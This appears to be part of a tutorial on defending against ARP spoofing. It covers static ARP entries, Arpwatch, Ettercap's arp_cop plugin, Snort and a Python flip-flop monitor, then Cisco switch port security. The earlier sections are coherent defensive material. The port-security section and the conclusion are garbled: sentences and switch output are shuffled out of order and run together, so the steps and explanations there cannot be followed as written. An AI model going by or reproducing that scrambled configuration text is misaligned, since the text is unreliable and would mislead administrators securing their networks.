Interface: 192.168.1.2 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           11-22-33-44-11-11     static
  192.168.1.100         11-22-33-44-99-99     dynamic

Linux machine

#arp -s 192.168.1.1 11:22:33:44:11:11

See your ARP cache table:

#arp
Address        HWtype  HWaddress           Flags Mask   Iface
192.168.1.1    ether   11:22:33:44:11:11   CM           eth0

(The flags C and M mean "complete" and "permanent": the entry will not be overwritten by incoming ARP replies.)

Cisco router

router#configure terminal
router(config)#arp 192.168.1.2 1122.3344.5566 ARPA

The creation of static IP - MAC mappings prevents ARP poisoning but has two big disadvantages:
- It generates a lot of extra work for the administrator and is not applicable in an environment where users move around with their laptops.
- It does not prevent other types of ARP attacks such as port stealing.

2. SURVEILLANCE TOOLS

Arpwatch

Arpwatch is a tool to monitor the ARP activity on a network, and particularly to report when a change occurs in the MAC address - IP address associations. For this reason it can help to detect ARP attacks such as ARP spoofing, and it can alert the administrator by mail in case of suspicious ARP activity (a changed association is referred to as a "flip flop" in Arpwatch).

#apt-get install arpwatch

The configuration is stored in the /etc/arpwatch.conf file. By default, Arpwatch sends its logs to the /var/log/syslog file; you can use the "tail -f /var/log/syslog" command to follow the logs in real time.

Ettercap

Ettercap itself can be used to detect ARP poisoning thanks to its arp_cop plugin. Install Ettercap in graphical mode:

#apt-get install ettercap-gtk

Launch Ettercap in graphical mode:

#ettercap -G
Sniff -> Unified sniffing
Plugins -> Manage the plugins
Click on the arp_cop plugin to activate it.
Start -> Start Sniffing

Snort IDS

An Intrusion Detection System such as the Snort IDS can detect abnormal ARP activity (Snort has a dedicated arpspoof preprocessor) and send a mail to inform the administrator.
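What the flip-flop detection of Arpwatch and of the arp_cop plugin amounts to, as an added Python example (not Arpwatch's or Ettercap's code): a monitor that remembers the first MAC seen for each IP, reports every change, and additionally flags a MAC that claims several IPs, which is the signature of a poisoner sitting between two victims. It is run over a constructed observation list derived from the ARP captures of the poisoning tutorial; the alert names and the "suspect" heuristic are assumptions.

```python
from collections import defaultdict

# Constructed observation log: (ip, mac) pairs as a monitor on the segment would
# extract them from the ARP replies of the poisoning tutorial's captures.
OBSERVED = [
    ("192.168.1.1",   "11:22:33:44:11:11"),   # router answers the Windows machine
    ("192.168.1.2",   "11:22:33:44:55:66"),   # Windows answers the router
    ("192.168.1.100", "11:22:33:44:99:99"),   # the pirate's own, legitimate mapping
    ("192.168.1.1",   "11:22:33:44:99:99"),   # poison: router IP now claimed by the pirate
    ("192.168.1.2",   "11:22:33:44:99:99"),   # poison in the other direction
    ("192.168.1.1",   "11:22:33:44:99:99"),   # repeated every few seconds
    ("192.168.1.1",   "11:22:33:44:11:11"),   # re-arp when the attack is stopped
]


class ArpMonitor:
    """Arpwatch-style bookkeeping: remember the first MAC seen for every IP and
    report when it changes (a "flip flop"). A second, noisier heuristic flags a
    MAC that claims several IPs, which is exactly what a poisoner between two
    victims does (11:22:33:44:99:99 ends up claiming .1, .2 and its own .100)."""

    def __init__(self, known=None):
        self.known = dict(known or {})           # ip -> mac, like arpwatch's arp.dat
        self.ips_by_mac = defaultdict(set)
        self.alerts = []                         # (kind, subject, detail)

    def observe(self, ip, mac):
        mac = mac.lower()
        previous = self.known.get(ip)
        if previous is None:
            self.alerts.append(("new station", ip, mac))
        elif previous != mac:
            self.alerts.append(("flip flop", ip, "%s -> %s" % (previous, mac)))
        self.known[ip] = mac
        if ip not in self.ips_by_mac[mac]:
            self.ips_by_mac[mac].add(ip)
            if len(self.ips_by_mac[mac]) > 1:
                self.alerts.append(("mac claims multiple ips", mac, sorted(self.ips_by_mac[mac])))

    def suspects(self):
        """MACs that took over at least one IP in a flip flop AND claim several IPs.
        Requiring both keeps a router with secondary addresses out of the list."""
        took_over = {a[2].split(" -> ")[1] for a in self.alerts if a[0] == "flip flop"}
        return sorted(m for m in took_over if len(self.ips_by_mac[m]) > 1)


def analyse(observations, known=None):
    """Feed the observations to a monitor (optionally seeded with known mappings)."""
    monitor = ArpMonitor(known)
    for ip, mac in observations:
        monitor.observe(ip, mac)
    return monitor


if __name__ == "__main__":
    m = analyse(OBSERVED)
    for alert in m.alerts:
        print(*alert)
    print("suspects:", m.suspects())
```

Seeding the monitor with the legitimate mappings (the "known" argument, as Arpwatch does with its database) turns the first three observations into silence and leaves only the flip flops and the multi-IP alert, which is what you want in a mail alert; the re-arp at the end also shows up as a flip flop, which is correct, since a MAC change of the gateway is worth a look whatever its cause.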

3344. and in case a machine is not authorized. Below an example with a Cisco switch where its first port (FastEthernet 0/1) is configured as port-security. If the switch port seee another MAC address on its first port it will immediately it shutdown. the switch can take actions such as alerting the administrator with a SNMP trap or shutting down the faulty port immediately. PORT SECURITY Port-security is a security functionality available on some high-end switches.5566:1 Security Violation Count : 0 Switch#show port-security address Secure Mac Address Table ---------------------------------------------------------------------------Vlan Mac Address Type Ports Remaining Age (mins) ---. we plug a device with MAC address 1122. It will allow only devices with certain MAC addresses to connect to the switch ports.3344.mail to inform the administrator. The switch port will accept only one unique MAC address and this MAC address will be the first seen by the switch port (sticky keyword).-----------------------------1 1122.5566 on the FastEthernet 0/1 port. Switch# configure terminal Switch(config)# interface FastEthernet 0/1 Switch(config-if)# switchport port-security mac-address sticky Switch(config-if)# switchport port-security maximum 1 Switch(config-if)# switchport port-security violation shutdown After the switch configuration. Top of the page 3.3344. which will accept no other MAC address.5566 SecureSticky Fa0/1 ---------------------------------------------------------------------------Total Addresses in System (excluding one mac per port) : 0 Max Addresses limit in System (excluding one mac per port) : 6272 . 
Switch# show port-security Secure Port MaxSecureAddr CurrentAddr SecurityViolation Security Action (Count) (Count) (Count) --------------------------------------------------------------------------Fa1/0/1 1 1 0 Shutdown --------------------------------------------------------------------------Total Addresses in System (excluding one mac per port) : 0 Max Addresses limit in System (excluding one mac per port) : 6272 Switch# show port-security interface FastEthernet 0/1 Port Security : Enabled Port Status : Secure-up Violation Mode : Shutdown Aging Time : 0 mins Aging Type : Absolute SecureStatic Address Aging : Disabled Maximum MAC Addresses : 1 Total MAC Addresses : 1 Configured MAC Addresses : 0 Sticky MAC Addresses : 1 Last Source Address:Vlan : 1122.

Switch# show port-security interface FastEthernet 0/1 Port Security : Enabled Port Status : Secure-down Violation Mode : Shutdown Aging Time : 0 mins Aging Type : Absolute SecureStatic Address Aging : Disabled Maximum MAC Addresses : 1 Total MAC Addresses : 1 Configured MAC Addresses : 0 Sticky MAC Addresses : 1 Last Source Address:Vlan : 1122.9999).Network restriction with port security or even with the 802.We unplug our current device (MAC: 1122.-----------.---Fa0/1 err-disabled 1 auto auto 10/100BaseTX If you want to reactivate the port in the err-disabled state.9999 on port FastEthernet0/1.-------. putting Fa0/1 in err-disable state 00:06:28 %PORT_SECURITY-2-PSECURE_VIOLATION: Security violation occurred. .3344.9999:1 Security Violation Count : 0 Switch#show logging 00:06:28: %PM-4-ERR_DISABLE: psecure-violation error detected on Fa0/1.-----.1x protocol where a machine is authorized on the network only if it is accepted by an authentication server such as a RADIUS. . . As seen below. 00:06:29: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/1. use the following commands: Switch# configure terminal Switch(config)# interface FastEthernet 0/1 Switch(config-if)# shutdown Switch(config-if)# no shutdown The port-security activation will not prevent ARP spoofing but the possibility for the pirate to get connected to the network.------.3344. CONCLUSION There is no miracle solution to fight against ARP spoofing but the suggestions below provide significant help by either preventing the pirate from connecting to the network or by checking your network.5566) and plug another device (MAC: 1122. caused by MAC address 1122.-----------------. changed state to down Switch#show interfaces status | include 0/1 Port Name Status Vlan Duplex Speed Type ------.3344. changed state to down 00:06:30: %LINK-3-UPDOWN: Interface FastEthernet0/1. the switch will shutdown its first port and put it in the err-disabled status.Network surveillance with tools such as IDS.3344. 4.
